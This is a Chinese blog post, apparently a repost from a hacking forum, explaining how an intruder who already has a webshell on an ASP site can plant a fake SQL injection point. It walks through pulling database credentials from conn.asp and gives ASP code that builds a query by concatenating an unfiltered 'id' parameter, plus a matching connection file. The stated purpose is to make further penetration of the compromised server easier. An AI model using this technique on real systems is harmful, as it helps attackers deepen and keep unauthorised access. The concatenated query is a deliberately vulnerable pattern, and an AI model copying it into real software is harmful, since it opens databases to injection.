自己伪造注入点方便渗透

今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息

这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!

首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和

密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表

因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:

程序代码 程序代码
<!--#include file="xx.asp"-->
<%
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id
rs.open strSQL,conn,1,3
rs.close
%>


把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在

你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!

然后就要构造一个连接数据库的文件了,代码如下:
程序代码 程序代码
<%        
strSQLServerName = "000.000.000.000"     '服务器名称或地址
strSQLDBUserName = "sqlname"         '数据库帐号
strSQLDBPassword = "sqlpass"         '数据库密码
strSQLDBName = "sqldataname"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>



这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,

就这样,正常情况下,就OK了,伪造成功……

           如果有什么问题可以提出来大家一起探讨解决。
 

下面是构造的好示例:

<%       
strSQLServerName = "000.000.000.000"     '服务器名称或地址
strSQLDBUserName = "sqlname"         '数据库帐号
strSQLDBPassword = "sqlpass"         '数据库密码
strSQLDBName = "sqldataname"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
%>

存为XX.asp就行!~这里的文件名要和INCLUDE相同

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值